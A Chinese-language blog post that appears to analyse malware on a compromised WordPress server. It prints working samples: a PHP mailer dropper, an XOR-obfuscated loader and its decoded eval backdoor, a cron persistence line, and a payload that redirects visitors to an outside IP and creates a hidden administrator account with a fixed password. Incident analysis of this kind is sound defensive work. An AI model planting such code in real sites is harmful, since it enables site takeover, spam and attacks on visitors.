分析被駭主機的惡意程式
主機環境
PHP Version 7.0.11 disable_functions exec,passthru,proc_open,shell_exec,system,popen,dl crontabs-1.10-33.el6.noarch Linux cross.dev 2.6.32-754.14.2.el6.x86_64 #1 SMP Tue May 14 19:35:42 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux CentOS release 6.6 (Final) Server version: Apache/2.2.15 (Unix) plesk version Product version: 12.0.18 Update #101
查看到惡意程序
apache 38715 0.3 0.2 1958144 69272 ? Ss 09:31 0:00 sid -DFOREGROUND apache 45368 7.8 0.0 139672 8804 ? Ss 14:50 7:51 selix apache 50910 0.3 0.0 138192 5480 ? Ss 16:26 0:00 selix
當下可以用 strace 或 lsof 追蹤惡意程序在作什麼事情
strace -p pid lsof -p pid
根據惡意程序的建立(產生) 的時間 (09:31 ) 去反查 access_log access_ssl_log 記錄
查到可能的記錄 GET //wp-content/themes/news-box-lite/httpd.pl
也有很多 POST /wp-content/themes/news-box-lite/ocqwjyrrl.php (也有一堆 POST /xmlrpc.php)
news-box-lite 裡有一推亂數的 php 檔,像 ocqwjyrrl.php
內容都是
<?php $jewrqwbnlk = base64_decode($_POST['ylxqjqbcn']); $xaouf = base64_decode($_POST['nrsf']); $jwgpxlzblkepa = base64_decode($_POST['tdluhqtnmzr']); $fcublsqtpae = base64_decode($_POST['qqifquaqdzvp']); $jfnbrsjfq = mail($jewrqwbnlk, $xaouf, $jwgpxlzblkepa , $fcublsqtpae); if($jfnbrsjfq){echo 'vwkxlpc';} else {echo 'yfbhn : ' . $jfnbrsjfq;}
也就是它們都是透過 wordpress 進來的 (檔案是 apache id 或 user id 權限)
惡意程序是用 apache 使用者執行的,但它們不是 httpd 程式,所以隨機產生了 pid 或 sid 或 selix 程序名稱
它們會去對外連線 25 port 及 53 port,可能在攻擊 smtp 、dns、或亂發信
並在 /var/spool/cron/apache 排程了 */10 * * * * perl /var/tmp/obNAwDiLPa >/dev/null 2>&1
/var/spool/cron/apache 當下是 apache:apache 權限,我把它改成 chown root:root、chmod 400 了並刪除 perl 排程,還是被成功改成 apache:apache (也排程了) (可能攻破了某核心部份)
可能由 GET /wp-content/themes/news-box-lite/httpd.pl 產生這些過程的 (排程、apache 惡意程序),但這支 httpd.pl 已被刪,無法得知內容
一堆惡意程式其中一個
<?php $ZrbHHby='::H1 E5UHT0=. -'; $ISrLPIE='YH-PT j3=:SIGOC'^$ZrbHHby; $PcifgM='0Vme,6;69TU9e+.S1G6ymAT>2W979sn=,5wLXAECa, ,.,iaTlO=Ks1U;cg0RdR:XCL=RblZS qeSzonq3RXKEPGF>O kyibDXJfmb=4I7xJBXJ9BVi=SJ5=+m-SYHPtWAAXWuhp-<;=SHXlfls:HboLM>M2JbtjQ=P.64SLg-BMpCe..7 bdmrO 9,RB6 =H-lX594UWY k2WOZeU6DWbvgQ0X;IEQHYO8JJkRA+456b.=:hmzaYTkH1M8Vtwid0B SJ69 36W9ZG;=pr< NMXmu0-N+xWwWsGA=sRMU2I-nE,1IlokZdWkuZ TvreROqb -Dpq0u5kHreUetqnUobQ+dzdpgNJ09,KrZY>a X-:;EjBD9K+ A3mxcqPJ 7aEAPbyqG=MlW8,VMwJ =5lw5 B 6 m>OY>fP6 8bjear0xHH CM< vPM7aku4mploq3hd8exm3zx4bqkEXAno'; $mFDvwn=$ISrLPIE('', 'Y0EDJCUUM=:W:NV:B3EQJ9;Lm3XCX,1PYAPeqa>IhJUR65QYNK=RR8+A,753U-IIiSTEJGZUP3OSRORHd.pksP;;6WwPVaZs:eH-7qB:TEIgaHuSP:<N.7RyJJS< AtRV MJK>kkE ,MptVUBqZMZM2E=1ockWZ0B8CYrArI,1 X<JH16YX8zAegxA7,>7>obQ:TBBck9R7lgFYU=VXwb>+U13R7w.TIJ2F6 hmT1 -+2NbzKSIX2+0LNH,ys:z.7HAGRT2E TUuWF.P>C+KGOxpST6O7=XX3XSSbRX.JaaT1;5RqIYaG-4E.Te1gyTFYPwOH.D8EmOOjF<1 2P,OPM4nuc1 61X,Hau1EYwrDCA:A ;+CIAfN<m6QLP6KV.NNUu,,GshfEiZ,F+BIJuK1BCQhFnPH0zIAJOCABYM2:NJI +WLT2HD ZKk16-A4m::.M7W72TB85U;T- yl=.L+cGreOUAW=EXCADAk02ClU,L7TQODQ0R23iREJi2A34ONXUWE7jtMQTL:JQwQqSo,YFzi1S=L5bGT0K2BzYjKR9FmBFTd-BVFOtEBQGWSqAQbRCGX3XQhJCSDVAn+BKM2-1E DIO6Be4X2GO WJTCU4+TVHlapBYQgFGe2NM:eS.AIT7PEA;LOWDJcfb4o5NILJZLZxMr-+H,eQDCx STCQk>5>94a3Fp1,=l27g6S6lqhUe'^$PcifgM); $mFDvwn();
單單它的 $mFDvwn = $ISrLPIE(”, XXX); $mFDvwn(); 是怎麼讓程式執行,感覺看起來只是 echo string,
但其實它靠這個 ^ 去建立 create_function (https://www.php.net/manual/en/function.create-function.php) (^ 的說明 https://www.php.net/manual/en/language.operators.bitwise.php)
到 https://www.unphp.net/decode/5913a97d362273e62447aa6654ab3071/ 解開
<?php if (!function_exists('xor_data__mut')) { function xor_data__mut($data, $key) { $out = ''; for ($i = 0;$i < strlen($data);$i++) $out.= ($data[$i] ^ $key[$i % strlen($key) ]); return ($out); } } $data = false; $data_key = false; foreach ($_COOKIE as $key => $value) { $data_key = $key; $data = $value; } if (!$data) { foreach ($_REQUEST as $key => $value) { $data_key = $key; $data = $value; } } $data = @unserialize(xor_data__mut(base64_decode($data), $data_key)); if ($data && array_key_exists('key', $data) && (md5($data['key']) == 'cf94416b34fb053a2b893477766f739a') && array_key_exists('payload', $data)) { eval($data['payload']); exit(0); } echo (md5(md5($_SERVER["HTTP_HOST"])));
create_function 一個範例
create_function('$name', 'echo "Hello ".$name');
類似於
function fname($name) { echo "Hello ".$name; }
還有一檔 wp-data.php,裡面有一些 base64 編碼過的,它在作那些事 ↓
1。掃目錄 www、httpdocs 或 public_html 等等 2。弄 htaccess m^r^<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> 3。導到別的地方 m^r^<?php error_reporting(0);function a_($c_=32){$c0="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";$c1=strlen($c0);$c2="";for($c3=0;$c3<$c_;$c3++){$c2.=$c0[rand(0,$c1-1)];}return$c2;}$c4=array("Chrome","Firefox","Edge","Opera","Android","Safari","Windows");foreach($c4 as$c5){if(stripos($_SERVER['HTTP_USER_AGENT'],$c5)!==false){if(!isset($_COOKIE["wp-authcookie-1"])&&!isset($_COOKIE["wp-settings-time-1"])){setcookie("wp-authcookie-1","1",time()+3600*24*2);header("L"."oc"."at"."io"."n: ht"."tp:"."//"."13"."4.2"."49."."11"."6.78"."/?"."ke"."y=".a_());}}};?> 4。建 wordpress 使用者 m^r^<?php $createuser = wp_create_user('wordcamp', 'z43218765z', 'wordcamp@wordpress.com'); $user_created = new WP_User($createuser); $user_created -> set_role('administrator'); ?>
留言